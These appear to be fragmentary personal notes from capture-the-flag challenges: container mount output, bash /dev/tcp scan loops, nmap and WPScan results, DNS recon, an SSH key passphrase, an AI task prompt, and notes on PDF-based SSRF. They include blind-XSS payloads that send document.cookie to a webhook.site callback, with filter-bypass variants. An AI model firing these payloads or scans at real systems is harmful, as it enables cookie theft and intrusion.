/dev/vda1 /app/config.yaml ext4 ro,relatime,discard,errors=remount-ro,commit=30 0 0
/dev/vda1 /root/flag.txt ext4 ro,relatime,discard,errors=remount-ro,commit=30 0 0
/dev/vda1 /etc/resolv.conf ext4 ro,relatime,discard,errors=remount-ro,commit=30 0 0
/dev/vda1 /etc/hostname ext4 ro,relatime,discard,errors=remount-ro,commit=30 0 0
/dev/vda1 /etc/hosts ext4 ro,relatime,discard,errors=remount-ro,commit=30 0 0
/dev/vda1 /app/templates/info.gohtml ext4 ro,relatime,discard,errors=remount-ro,commit=30 0 0
/dev/vda1 /app/templates/json.gohtml ext4 ro,relatime,discard,errors=remount-ro,commit=30 0 0
/dev/vda1 /app/data/data.db ext4 rw,relatime,discard,errors=remount-ro,commit=30 0 0
proc /proc/bus proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/fs proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/irq proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/sys proc ro,nosuid,nodev,noexec,relatime 0 0
proc /proc/sysrq-trigger proc ro,nosuid,nodev,noexec,relatime 0 0
tmpfs /proc/acpi tmpfs ro,relatime,inode64 0 0
tmpfs /proc/interrupts tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
tmpfs /proc/kcore tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
tmpfs /proc/keys tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
tmpfs /proc/latency_stats tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
tmpfs /proc/timer_list tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
tmpfs /proc/scsi tmpfs ro,relatime,inode64 0 0
tmpfs /sys/firmware tmpfs ro,relatime,inode64 0 0
grep CapEff /proc/self/status
CapEff: 00000000a80425fb

for i in $(seq 1 254); do (timeout 0.5 bash -c ">/dev/tcp/$(ip route | awk '/default/ {print $3}' | head -1)/$i 80" 2>/dev/null && echo "80 open on $i") & done; wait

for H in 10.19.0.{60..130} 172.19.0.{2..30}; do
  for p in 21 22 80 443 3306 5432 6379 8000 8080 8443; do
    timeout 0.3 bash -c "cat </dev/null >/dev/tcp/$H/$p" 2>/dev/null && echo "$H:$p open" >> asdf.log &
  done
done; wait


grep CapEff /proc/self/status
CapEff: 00000000a80425fb

Great—your CapEff (`00000000a80425fb`) includes **CAP_NET_RAW** but **not** CAP_NET_ADMIN.  
That means: you _can_ sniff packets, but you likely **can’t enable promiscuous mode**. So run tcpdump with `-p` (no promisc).

`CHOWN, DAC_OVERRIDE, FOWNER, FSETID, KILL, SETGID, SETUID, SETPCAP, NET_BIND_SERVICE, **NET_RAW**, SYS_CHROOT, MKNOD, AUDIT_WRITE, SETFCAP` — **no NET_ADMIN**.


46.101.222.148 - uptime kuma


proxy=http://738iz9u7c7n67s5tbih6vem970dw1q6kx8sygo3er3.oastify.com/proxy

chall 5

./n -p22,80,443 100.64.0.5/24 -Pn -v
Completed SYN Stealth Scan at 19:18, 0.21s elapsed (3 total ports)
Nmap scan report for moshcast.prod.beanbe.at (100.64.0.5)
Host is up (0.000060s latency).
PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  closed http
443/tcp closed https

Initiating SYN Stealth Scan at 19:18
Scanning moshzilla-fw.prod.beanbe.at (100.64.0.7) [3 ports]
Completed SYN Stealth Scan at 19:18, 0.21s elapsed (3 total ports)
Nmap scan report for moshzilla-fw.prod.beanbe.at (100.64.0.7)
Host is up (0.026s latency).
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  closed http
443/tcp closed https


Completed SYN Stealth Scan at 19:36, 0.21s elapsed (3 total ports)
Nmap scan report for moshcast (10.19.0.27)
Host is up (0.000087s latency).
PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  closed http
443/tcp closed https

./n -p22,80,443 172.17.0.0/24 -Pn -v
Discovered open port 22/tcp on 172.17.0.1
Completed SYN Stealth Scan at 19:37, 0.21s elapsed (3 total ports)
Nmap scan report for moshcast (172.17.0.1)
Host is up (0.000058s latency).
PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  closed http
443/tcp closed https

./n -p22,80,443 172.18.0.0/24 -Pn -v
Discovered open port 22/tcp on 172.18.0.1
Completed SYN Stealth Scan at 19:38, 0.21s elapsed (3 total ports)
Nmap scan report for moshcast (172.18.0.1)
Host is up (0.000077s latency).
PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  closed http
443/tcp closed https


./n -p22,80,443 172.19.0.0/24 -Pn -v
Initiating Parallel DNS resolution of 1 host. at 19:40
Completed Parallel DNS resolution of 1 host. at 19:40, 0.00s elapsed
Initiating SYN Stealth Scan at 19:40
Scanning 172.19.0.2 [3 ports]
Completed SYN Stealth Scan at 19:40, 0.21s elapsed (3 total ports)
Nmap scan report for 172.19.0.2
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.000038s latency).
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  closed http
443/tcp closed https
MAC Address: 1A:D9:77:6F:79:E2 (Unknown)

Initiating SYN Stealth Scan at 19:40
Scanning moshcast (172.19.0.1) [3 ports]
Discovered open port 22/tcp on 172.19.0.1
Completed SYN Stealth Scan at 19:40, 0.21s elapsed (3 total ports)
Nmap scan report for moshcast (172.19.0.1)
Host is up (0.000065s latency).
PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  closed http
443/tcp closed https

10.114.32.2/20
./n -p22,80,443 10.114.32.0/24 -Pn -v

443/tcp closed   https                                                                                                                                                                                       [0/1887]
MAC Address: 76:13:91:44:62:DD (Unknown)

Nmap scan report for 10.114.32.4
Host is up (-0.13s latency).
PORT    STATE    SERVICE
22/tcp  filtered ssh
80/tcp  closed   http
443/tcp closed   https
MAC Address: AE:1F:E8:A9:52:07 (Unknown)

Nmap scan report for 10.114.32.5
Host is up (-0.13s latency).
PORT    STATE    SERVICE
22/tcp  filtered ssh
80/tcp  open     http
443/tcp open     https
MAC Address: 5E:79:E3:BC:5F:AA (Unknown)

Nmap scan report for 10.114.32.6
Host is up (-0.13s latency).
PORT    STATE    SERVICE
22/tcp  filtered ssh
80/tcp  open     http
443/tcp open     https
MAC Address: 2E:C7:13:0C:74:95 (Unknown)

Nmap scan report for 10.114.32.7
Host is up (-0.12s latency).
PORT    STATE    SERVICE
22/tcp  filtered ssh
80/tcp  filtered http
443/tcp filtered https
MAC Address: F2:E4:3D:7A:7E:65 (Unknown)

Initiating SYN Stealth Scan at 19:42
Scanning moshcast (10.114.32.2) [3 ports]
Discovered open port 22/tcp on 10.114.32.2
Completed SYN Stealth Scan at 19:42, 0.22s elapsed (3 total ports)
Nmap scan report for moshcast (10.114.32.2)
Host is up (0.000068s latency).
PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  closed http
443/tcp closed https

Read data files from: /etc
Nmap done: 256 IP addresses (7 hosts up) scanned in 8.51 seconds
           Raw packets sent: 552 (16.064KB) | Rcvd: 33 (1.168KB)
           
           
./n -p53,445 10.114.32.0/24 -Pn -v

info

https://helpdesk.maultaschenfabrikle.de/

Other

(wayback) .../susanne.berger/VirtualBox VMs/jump > diff jump.vbox jump.vbox-prev                                                                                                                                        lo at kali (--)(main)
9c9
<   <Machine uuid="{09eb80b7-fd61-46eb-b3b5-f801118eb33d}" name="jump" OSType="Linux_64" snapshotFolder="Snapshots" lastStateChange="2025-04-28T06:20:29Z" aborted="true">
---
>   <Machine uuid="{09eb80b7-fd61-46eb-b3b5-f801118eb33d}" name="jump" OSType="Linux_64" snapshotFolder="Snapshots" lastStateChange="2025-04-28T06:20:28Z">


7z l jump.vdi                                                                                                                                                        lo at kali (--)(main)

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=en_US.UTF-8 Threads:3 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 2097152 bytes (2048 KiB)

Listing archive: jump.vdi

--
Path = jump.vdi
Type = VDI
Physical Size = 2097152
Headers Size = 2097152
Method = Dynamic
Comment =
{

Creat  : {e8923fea-b727-4ae2-a34e-38aff86232cc}
Modif  : {7ec54d2f-3baf-4341-95bf-e72c78f0f915}
}
Name = {e8923fea-b727-4ae2-a34e-38aff86232cc}.vdi

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
                    .....   8589934592            0  jump.img
------------------- ----- ------------ ------------  ------------------------
                            8589934592            0  1 files

external

mail.ulmageddon.com
shop.ulmageddon.com
www.ulmageddon.com


Completed SYN Stealth Scan at 16:19, 14.72s elapsed (1000 total ports)
Nmap scan report for shop.ulmageddon.com (164.92.226.169)
Host is up (0.16s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https


ulmageddon.com (FQDN) --> ns_record --> dns2.registrar-servers.com (FQDN)
ulmageddon.com (FQDN) --> ns_record --> dns1.registrar-servers.com (FQDN)
ulmageddon.com (FQDN) --> mx_record --> mail.ulmageddon.com (FQDN)
dns2.registrar-servers.com (FQDN) --> a_record --> 156.154.133.200 (IPAddress)
dns2.registrar-servers.com (FQDN) --> aaaa_record --> 2610:a1:1025::200 (IPAddress)
dns1.registrar-servers.com (FQDN) --> a_record --> 156.154.132.200 (IPAddress)
dns1.registrar-servers.com (FQDN) --> aaaa_record --> 2610:a1:1024::200 (IPAddress)
156.154.132.0/24 (Netblock) --> contains --> 156.154.132.200 (IPAddress)
2610:a1:1024::/48 (Netblock) --> contains --> 2610:a1:1024::200 (IPAddress)
156.154.133.0/24 (Netblock) --> contains --> 156.154.133.200 (IPAddress)
2610:a1:1025::/48 (Netblock) --> contains --> 2610:a1:1025::200 (IPAddress)
397222 (ASN) --> managed_by --> ULTRADNS - NeuStar, Inc. (RIROrganization)
397222 (ASN) --> announces --> 156.154.132.0/24 (Netblock)
397240 (ASN) --> managed_by --> ULTRADNS - NeuStar, Inc. (RIROrganization)
397240 (ASN) --> announces --> 2610:a1:1024::/48 (Netblock)
397237 (ASN) --> managed_by --> ULTRADNS - NeuStar, Inc. (RIROrganization)
397237 (ASN) --> announces --> 156.154.133.0/24 (Netblock)
397228 (ASN) --> managed_by --> ULTRADNS - NeuStar, Inc. (RIROrganization)
397228 (ASN) --> announces --> 2610:a1:1025::/48 (Netblock)
autodiscover.ulmageddon.com (FQDN) --> cname_record --> mail.ulmageddon.com (FQDN)

commit 0493e887ca28c9a1db92af44afde2a120930ad04 (HEAD -> main, origin/main, origin/HEAD)
Author: moshzilla <moshzilla@moshzilla.rocks>
Date:   Thu Mar 20 12:02:55 2025 +0100

    First release

commit 8530b49800c3af18c6134183f3987508341a31f3
Author: moshzilla <dennis.herrmann@code-white.com>
Date:   Thu Mar 20 11:51:09 2025 +0100

    Initial commit
    
    
admin@moshzilla.rocks

tips


i4KA3mV3pPjWlo2SXfc7


   "url": "http://mtf.local/",
   wiki.mtf.local


[+] Caro Meier
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Rss Generator (Aggressive Detection)

[+] admin
 | Found By: Wp Json Api (Aggressive Detection)
 |  - https://moshzilla.rocks/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] caro
 | Found By: Wp Json Api (Aggressive Detection)
 |  - https://moshzilla.rocks/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Sitemap (Aggressive Detection)
 |   - https://moshzilla.rocks/wp-sitemap-users-1.xml
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] kevin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] selin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] joerg
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] nina
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] max
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

ok

You are solving the following ctf challenge: Initial Access - Ghosts of the Guardians

The fire fades, the waves stand still  
The boat departs beyond the hill  
A whisper calls through ash and stone  
“You're not the first… to die alone.”  
Shadows rise from sacred ground

we've been given the home folder of a user name susanne.berger. I've done some preliminary exploration and found the following:
- we have an ssh key in .ssh. the password for that key is i4KA3mV3pPjWlo2SXfc7 which was found in the keepass database for a "jumphost". I tried extracting data from the virtualbox vm but it seems like the vdi is empty so nothing there.

I've already found the flag.txt file on the destop.

I believe we have to find a way to use the ssh key to authenticate to a host however I don't know what the host is. There is also mentions of Putty in some of the chrome/edge tab sessions.

Keep summarising the task, what we've done and what we've found in task.md as you go.

blind xss to ssrf

<sCriPt>(new Image()).src ="https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0"; </sCriPt> -- failed


<img src=x onerror="(new Image()).src=`https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0?`+document.cookie" />


aaaaa<img src="https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0/google.com\\" /> " onerror\x00="(new Image()).src='https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0?success=1'"

a<img src="https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0/google.com\\" />b<img src="https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0/google.com\\" /> 


<img src="https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0/google.com\\" /><img src="onerror='123'" alt='' />

<img src="https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0/google.com\\" /><img src="onerror='123'" alt='' />

<img src="https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0/google.com\\" test="asdf" /> " onerror\x0a="asdf" a="<img src='/>' />

<img src='a\\'  /> onerror/="(new Image()).src='https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0'" data-eat="

<img src='https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0?latest\\'  /> " onbeforescriptexecute="(new Image()).src='https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0'" data-eat="

<img src='https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0?ok' />


<img src="test.png\\" /> " oncontentvisibilityautostatechange="(new Image()).src=`https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0`" style="display:block;content-visibility:auto" data-o="

<img src="test.png\\" /> " oncontentvisibilityautostatechange="(new Image()).src=`https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0`" style="display:block;content-visibility:auto" data-o="


<img oncontentvisibilityautostatechange=alert(1) style=display:block;content-visibility:auto>



file:///home/lo/Downloads/personalData-2025-10-05.pdf


https://onlinepngtools.com/images/examples-onlinepngtools/red-petaled-flower.png


## PDF data extraction


mutool draw -F txt /home/lo/Downloads/personalData-2025-10-05-2.pdf     


qpdf --qdf --object-streams=disable --stream-data=uncompress in.pdf out.qdf.pdf


----

12341234<img src="https://shop.ulmageddon.com/img/p/4/1/41-large_default.jpg" />ASDFASDF


ExifTool Version Number         : 13.25
File Name                       : 41-large_default.jpg
Directory                       : .
File Size                       : 169 kB
File Modification Date/Time     : 2025:05:26 08:14:11-04:00
File Access Date/Time           : 2025:10:05 16:20:25-04:00
File Inode Change Date/Time     : 2025:10:05 16:20:20-04:00
File Permissions                : -rw-rw-r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 96
Y Resolution                    : 96
Comment                         : CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90.
Image Width                     : 800
Image Height                    : 800
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 800x800
Megapixels                      : 0.640


<img src="https://127.0.0.1:8080/img/p/1/1/8/118-home_default.jpg" />

exiftool

ExifTool Version Number         : 13.25
File Name                       : personalData-2025-10-02.pdf
Directory                       : /home/lo/shared
File Size                       : 556 kB
File Modification Date/Time     : 2025:10:01 23:05:56-04:00
File Access Date/Time           : 2025:10:01 23:06:03-04:00
File Inode Change Date/Time     : 2025:10:01 23:07:14-04:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
Linearized                      : No
PDF Version                     : 1.7
Page Count                      : 2
Page Layout                     : SinglePage
Page Mode                       : UseNone
XMP Toolkit                     : Adobe XMP Core 4.2.1-c043 52.372728, 2009/01/18-15:08:04
Format                          : application/pdf
Title                           :
Creator                         :
Description                     :
Subject                         :
Create Date                     : 2025:10:02 05:06:01+02:00
Creator Tool                    :
Modify Date                     : 2025:10:02 05:06:01+02:00
Metadata Date                   : 2025:10:02 05:06:01+02:00
Keywords                        :
Producer                        : TCPDF 6.4.4 (http://www.tcpdf.org)
Document ID                     : uuid:080de53a-e51b-662a-38b9-cea5a57c4841
Instance ID                     : uuid:080de53a-e51b-662a-38b9-cea5a57c4841
Schemas Namespace URI           : http://ns.adobe.com/pdf/1.3/
Schemas Prefix                  : pdf
Schemas Schema                  : Adobe PDF Schema
Schemas Property Category       : internal
Schemas Property Description    : Adobe PDF Schema
Schemas Property Name           : InstanceID
Schemas Property Value Type     : URI
Trapped                         : False


<img src="on<svg>error=asdf" />


<img src="x.png\\"" /> " onerror<tcpdf>="(new Image()).src=`https://webhook.site/45ac954f-cce8-4713-bab1-39daa427cce0`" a="<img src="x.png\\"" />

q
1 0 0 1 47.988848 0.000000 cm
BT /F2 9.000000 Tf ET
0.570000 w 0 J 0 j [] 0 d 0.000000 0.000000 0.000000 RG 1.000000 1.000000 1.000
000 rg
q 0.000000 0.000000 0.000000 rg BT 0 Tr 0.000000 w ET BT 32.346457 619.515173 T
d [(.1.9.2...2.2.6...1.3.5...2.4)] TJ ET Q

Q
0.570000 w 0 J 0 j [] 0 d 0.000000 0.000000 0.000000 RG 1.000000 1.000000 1.000
000 rg
BT /F2 9.000000 Tf ET
1.000000 1.000000 1.000000 rg
0.000000 0.000000 0.000000 RG

q
1 0 0 1 31.775000 0.000000 cm
0.000000 0.000000 0.000000 RG

Q

q
1 0 0 1 58.680848 0.000000 cm
BT /F2 9.000000 Tf ET
0.570000 w 0 J 0 j [] 0 d 0.000000 0.000000 0.000000 RG 1.000000 1.000000 1.000
000 rg
q 0.000000 0.000000 0.000000 rg BT 0 Tr 0.000000 w ET BT 211.874152 619.515173
Td [(.<.i.f.r.a.m.e. ./.>)] TJ ET Q



// using this version or before

https://github.com/PrestaShop/psgdpr/tree/44e519e31b72429c21c5aaba0468ebba10742b39/views/templates/front/pdf

https://github.com/PrestaShop/PrestaShop/commit/01fafc189a0098aee761102a379d86c63d4c2f21

chall 0

// check the map for photos or somthing